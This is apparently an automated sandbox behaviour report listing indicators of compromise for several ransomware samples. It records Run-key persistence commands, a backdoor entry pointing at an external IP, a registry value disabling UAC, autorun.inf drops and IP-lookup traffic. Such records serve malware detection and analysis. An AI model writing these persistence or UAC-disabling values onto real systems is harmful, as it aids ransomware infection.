description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defender = "C:\\Users\\Admin\\Desktop\\00369\\HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe" HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Analsext = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\APHoFWGP\\Appvvel9.exe" Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe = "C:\\Windows\\System32\\Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe" Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NxdQfudu = "C:\\Users\\Admin\\AppData\\Local\\froeurte\\nxdqfudu.exe" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom = "C:\\Users\\Admin\\Desktop\\00369\\Trojan-Ransom.Win32.Foreign.oeth-3adfcd410678aeb41bc482ca955077c844c9b56748c7989d10ef003e0757f06c.exe" Trojan-Ransom.Win32.Foreign.oeth-3adfcd410678aeb41bc482ca955077c844c9b56748c7989d10ef003e0757f06c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp = "C:\\Users\\Admin\\AppData\\Roaming\\MyApp\\MyApp.exe" Trojan-Ransom.Win32.Foreign.ogko-b846630e62ef6507d2d54b17da3fcfd395278cb33bf2bfc6b2629b0d7eff474a.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apterium = "C:\\Users\\Admin\\AppData\\Roaming\\apterium.exe" HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\KL = "C:\\Users\\Admin\\AppData\\Local\\system.exe" Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\bd = "C:\\Users\\Admin\\AppData\\Local\\bd.exe 150.70.162.115 80" Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Admin\Searches\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Videos\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Public\Libraries\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Public\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1045960512-3948844814-3059691613-1000\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Public\Downloads\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini Explorer.EXE File opened for modification C:\Users\Public\Pictures\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Public\Videos\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Public\Music\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Documents\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Public\Documents\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Public\Desktop\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-1045960512-3948844814-3059691613-1000\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\z: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\v: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\h: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\i: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\u: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\J: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\R: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\X: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\j: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\l: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\y: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\g: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\m: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\B: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\M: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\w: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\o: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\p: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\b: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\e: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\s: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\x: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\I: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\N: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\n: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened (read-only) \??\k: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\t: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\q: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\r: Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe File opened (read-only) \??\E: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 235 iplogger.com 237 iplogger.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 159 whatismyipaddress.com 162 whatismyipaddress.com 189 checkip.amazonaws.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Trojan-Ransom.Win32.Foreign.oeth-3adfcd410678aeb41bc482ca955077c844c9b56748c7989d10ef003e0757f06c.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 Trojan-Ransom.Win32.Foreign.oeth-3adfcd410678aeb41bc482ca955077c844c9b56748c7989d10ef003e0757f06c.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023c83-458.dat autoit_exe behavioral1/files/0x0007000000023cf1-611.dat autoit_exe behavioral1/files/0x0008000000023ce1-12688.dat autoit_exe -
Drops autorun.inf file 1 TTPs 2 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification F:\AUTORUN.INF HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened for modification C:\AUTORUN.INF HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\HelpMe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File created C:\Windows\SysWOW64\notepad.exe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File created C:\Windows\System32\Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Windows\System32\Info.hta Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Windows\SysWOW64\HelpMe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe -
Suspicious use of SetThreadContext 12 IoCs
